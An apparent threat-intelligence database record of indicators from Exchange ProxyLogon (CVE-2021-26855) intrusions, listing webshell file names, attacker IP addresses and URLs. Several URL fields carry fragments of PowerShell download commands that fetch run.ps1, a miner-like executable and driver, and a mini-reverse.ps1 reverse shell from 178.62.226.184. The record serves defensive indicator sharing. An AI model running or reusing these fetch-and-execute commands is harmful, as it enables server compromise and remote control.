UNKNOWN
Tags
country: | Netherlands |
attack-pattern: | Powershell - T1059.001 Python - T1059.006 Server - T1583.004 Server - T1584.004 Connection Proxy - T1090 Powershell - T1086 |
Common Information
Type | Value |
---|---|
UUID | 4c83d340-5c6b-4532-81e7-b28561ef4c67 |
Fingerprint | 85384059f3fe690b |
Analysis status | IN_PROGRESS |
Considered CTI value | 0 |
Text language | |
Published | None |
Added to db | Dec. 19, 2024, 2:03 p.m. |
Last updated | Dec. 23, 2024, 7:23 a.m. |
Headline | UNKNOWN |
Title | UNKNOWN |
Detected Hints/Tags/Attributes | 25/2/200 |
Source URLs
Redirection | Url | |
---|---|---|
Details | Source | https://www.secrss.com/articles/30069 |
URL Provider
Attributes
Details | Type | #Events | CTI | Value |
---|---|---|---|---|
Details | CVE | 223 | cve-2021-26855 |
|
Details | Domain | 10 | microsoft.exchange.management |
|
Details | Domain | 2 | outlooken.us |
|
Details | Domain | 6752 | 163.com |
|
Details | 2 | admin@domain.tld |
||
Details | File | 6 | run.ps1 |
|
Details | File | 2 | j2r3.js |
|
Details | File | 2 | test1337.aspx |
|
Details | File | 2 | ssrf.js |
|
Details | File | 18 | exchange.asmx |
|
Details | File | 36 | schemas.xml |
|
Details | File | 170 | config.json |
|
Details | File | 1 | c:\\\\temp\\\\111\\\\config.json |
|
Details | File | 5 | javacpl.exe |
|
Details | File | 1 | c:\\\\temp\\\\111\\\\javacpl.exe |
|
Details | File | 22 | winring0x64.sys |
|
Details | File | 1 | c:\\\\temp\\\\111\\\\winring0x64.sys |
|
Details | File | 1353 | powershell.exe |
|
Details | File | 2 | fexppw.aspx |
|
Details | File | 6 | outlooken.aspx |
|
Details | File | 3 | logg.aspx |
|
Details | File | 3 | 8lw7tahf9i1pjnro.aspx |
|
Details | File | 4 | a.aspx |
|
Details | File | 2 | errorfs.aspx |
|
Details | File | 5 | errorpage.aspx |
|
Details | File | 2 | getpp.aspx |
|
Details | File | 91 | default.aspx |
|
Details | File | 3 | fatal-erro.aspx |
|
Details | File | 3 | errorpages.aspx |
|
Details | File | 4 | log.aspx |
|
Details | File | 3 | shel90.aspx |
|
Details | File | 3 | err0r.aspx |
|
Details | File | 15 | logout.aspx |
|
Details | File | 2 | exchange_create_css.aspx |
|
Details | File | 6 | redirsuiteserverproxy.aspx |
|
Details | File | 3 | one1.aspx |
|
Details | File | 5 | one.aspx |
|
Details | File | 2 | owafont_vo.aspx |
|
Details | File | 2 | app222.aspx |
|
Details | File | 2 | hmask.aspx |
|
Details | File | 2 | view_photos.aspx |
|
Details | File | 2 | erroraa.aspx |
|
Details | File | 2 | zntwv.aspx |
|
Details | File | 3 | bob.aspx |
|
Details | File | 2 | owafont_vn.aspx |
|
Details | File | 3 | shel2.aspx |
|
Details | File | 3 | shel.aspx |
|
Details | File | 3 | outlookzh.aspx |
|
Details | File | 2 | daxlz.aspx |
|
Details | File | 3 | authhead.aspx |
|
Details | File | 2 | bg_gradient_login.aspx |
|
Details | File | 5 | web.aspx |
|
Details | File | 21 | shell.aspx |
|
Details | File | 3 | wanlin.aspx |
|
Details | File | 5 | xx.aspx |
|
Details | File | 8 | errorff.aspx |
|
Details | File | 3 | shellex.aspx |
|
Details | File | 5 | erroreee.aspx |
|
Details | File | 78 | web.config |
|
Details | File | 4 | t.aspx |
|
Details | File | 9 | erroree.aspx |
|
Details | File | 3 | test.aspx |
|
Details | File | 5 | healthcheck.aspx |
|
Details | File | 7 | aspnet_client.aspx |
|
Details | File | 9 | help.aspx |
|
Details | File | 2 | error_page.aspx |
|
Details | File | 2 | 27fib.aspx |
|
Details | File | 6 | document.aspx |
|
Details | File | 2 | b.aspx |
|
Details | File | 5 | aspnet_iisstart.aspx |
|
Details | File | 2 | errorfe.aspx |
|
Details | File | 3 | aspnettest.aspx |
|
Details | File | 2 | evilcorp.aspx |
|
Details | File | 5 | errorew.aspx |
|
Details | File | 5 | aspnet_www.aspx |
|
Details | File | 2 | outlookda.aspx |
|
Details | File | 3 | expiredpassword.aspx |
|
Details | File | 2 | outlookar.aspx |
|
Details | File | 10 | logoff.aspx |
|
Details | File | 2 | outlookes.aspx |
|
Details | File | 2 | outlookio.aspx |
|
Details | File | 2 | outlookas.aspx |
|
Details | File | 2 | outlookfr.aspx |
|
Details | File | 2 | outlookpl.aspx |
|
Details | File | 2 | outlookse.aspx |
|
Details | File | 2 | outlookde.aspx |
|
Details | File | 2 | outlookit.aspx |
|
Details | File | 4 | outlookcn.aspx |
|
Details | File | 2 | seclogon.aspx |
|
Details | File | 2 | system_io.aspx |
|
Details | File | 2 | 6gixzg.aspx |
|
Details | File | 2 | hmknq.aspx |
|
Details | File | 2 | view_tools.aspx |
|
Details | File | 2 | errorpe.aspx |
|
Details | File | 2 | ignrop.aspx |
|
Details | File | 2 | outlookqn.aspx |
|
Details | File | 2 | amnbjlxqohtv.aspx |
|
Details | File | 2 | errordef.aspx |
|
Details | File | 2 | desktopshellext.aspx |
|
Details | File | 2 | logerr.aspx |
|
Details | File | 2 | rlvgk.aspx |
|
Details | File | 3 | owaauth.aspx |
|
Details | File | 2 | pzbwl.aspx |
|
Details | File | 2 | commonerror.aspx |
|
Details | File | 19 | logon.aspx |
|
Details | File | 3 | layout.aspx |
|
Details | File | 2 | config1.aspx |
|
Details | File | 4 | errorcheck.aspx |
|
Details | File | 2 | proximityservice.aspx |
|
Details | File | 2 | iasads.aspx |
|
Details | File | 2 | office365_ph.aspx |
|
Details | File | 2 | atlthunk.aspx |
|
Details | File | 2 | rwinsta.aspx |
|
Details | File | 2 | 061a06908b.aspx |
|
Details | File | 9 | error.aspx |
|
Details | File | 2 | zjbxcboi.aspx |
|
Details | File | 2 | frow.aspx |
|
Details | File | 3 | server.aspx |
|
Details | File | 2 | erroreww.aspx |
|
Details | File | 2 | fhsvc.aspx |
|
Details | File | 2 | exchanges.aspx |
|
Details | File | 5 | online.aspx |
|
Details | File | 4 | s.aspx |
|
Details | File | 2 | xblgamesave.aspx |
|
Details | File | 2 | secauth1.aspx |
|
Details | File | 2 | secauth.aspx |
|
Details | File | 3 | session.aspx |
|
Details | File | 2 | outlookfront.aspx |
|
Details | File | 2 | plorion.aspx |
|
Details | File | 6 | outlookru.aspx |
|
Details | File | 2 | proxylogon.aspx |
|
Details | File | 2 | qnx.aspx |
|
Details | File | 2 | ovfwhwjwwm.aspx |
|
Details | File | 2 | kbdbene.aspx |
|
Details | File | 2 | letmeinplzs.aspx |
|
Details | File | 3 | outlookus.aspx |
|
Details | File | 2 | jhj2zt9ouofp6vnbchg3.aspx |
|
Details | File | 23 | login.aspx |
|
Details | File | 2 | errorfff.aspx |
|
Details | File | 2 | ntprint.aspx |
|
Details | File | 4 | outlookdn.aspx |
|
Details | File | 6 | load.aspx |
|
Details | File | 2 | m0xbqrg1ranzvgd3jixt.aspx |
|
Details | File | 2 | jobjifr92erlmg1hcnf3.aspx |
|
Details | File | 6 | outlookjp.aspx |
|
Details | File | 7 | discover.aspx |
|
Details | File | 3 | xclkmcfldfi948398430fdjkfdkj.aspx |
|
Details | File | 2 | hujwperocy7fo4g8eth3.aspx |
|
Details | File | 6 | multiup.aspx |
|
Details | File | 4 | supp0rt.aspx |
|
Details | File | 2 | hcdknzboha.aspx |
|
Details | File | 2 | sol.aspx |
|
Details | File | 2 | fr5ha0d1dwfsqiumhlcq.aspx |
|
Details | File | 3 | signon.aspx |
|
Details | File | 2 | huupitrnpxvi.aspx |
|
Details | File | 2 | dbuj9.aspx |
|
Details | File | 2 | l2oxwtljs3gnmyhqv0kr.aspx |
|
Details | File | 6 | httpproxy.aspx |
|
Details | File | 2 | xboxnetapisvc.aspx |
|
Details | File | 5 | signout.aspx |
|
Details | File | 2 | krhhydpwb70ct362jmln.aspx |
|
Details | File | 2 | us.aspx |
|
Details | File | 2 | tst1.aspx |
|
Details | File | 2 | outlookun.aspx |
|
Details | File | 2 | tpmvscmgrsvr.aspx |
|
Details | File | 2 | shelltest.aspx |
|
Details | File | 2 | aspx_client.aspx |
|
Details | File | 3 | iispage.aspx |
|
Details | File | 2 | aaa.aspx |
|
Details | File | 2 | aa.aspx |
|
Details | File | 3 | aspnet.aspx |
|
Details | File | 2 | tnlpge.aspx |
|
Details | File | 2 | vqeualjkpcwonc7ypmlz.aspx |
|
Details | File | 2 | asas.aspx |
|
Details | File | 2 | test13037.aspx |
|
Details | File | 3 | aspnet_pages.aspx |
|
Details | File | 2 | ahihi.aspx |
|
Details | File | 4 | timeoutlogout.aspx |
|
Details | File | 2 | zi3umczmpa5bwtyvpkse.aspx |
|
Details | File | 2 | theme-gsx8ujzpicf0.aspx |
|
Details | File | 3 | default1.aspx |
|
Details | File | 2 | theme-vten8snn874b.aspx |
|
Details | File | 2 | checkerror635284.aspx |
|
Details | File | 2 | lgnleft.aspx |
|
Details | File | 2 | wmspdmod.aspx |
|
Details | File | 1 | oauth2-client.aspx |
|
Details | File | 2 | 1d61acae91.aspx |
|
Details | File | 2 | lo.aspx |
|
Details | File | 3 | error404.aspx |
|
Details | File | 2 | mini-reverse.ps1 |
|
Details | IPv4 | 2 | 178.62.226.184 |
|
Details | IPv4 | 1576 | 127.0.0.1 |
|
Details | IPv4 | 2 | 159.89.95.163 |
|
Details | IPv4 | 2 | 157.245.47.214 |
|
Details | IPv4 | 2 | 159.65.206.137 |
|
Details | Url | 2 | http://178.62.226.184/run.ps1 |
|
Details | Url | 1 | http://www.w3.org/2001/xmlschema-instance"xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages"xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types"xmlns:soap="http://schemas.xmlsoap.org/soap/envelope |
|
Details | Url | 2 | http://178.62.226.184/run.ps1)").stdout.readall |
|
Details | Url | 1 | http://178.62.226.184/config.json","c:\\\\temp\\\\111\\\\config.json")$webclient.downloadfile("http://178.62.226.184/javacpl.exe","c:\\\\temp\\\\111\\\\javacpl.exe")$webclient.downloadfile("http://178.62.226.184/winring0x64.sys","c:\\\\temp\\\\111\\\\winring0x64.sys |
|
Details | Url | 1 | http://178.62.226.184/mini-reverse.ps1http://178.62.226.184/run.ps1http://178.62.226.184/config.jsonhttp://178.62.226.184/javacpl.exehttp://178.62.226.184/winring0x64.sys |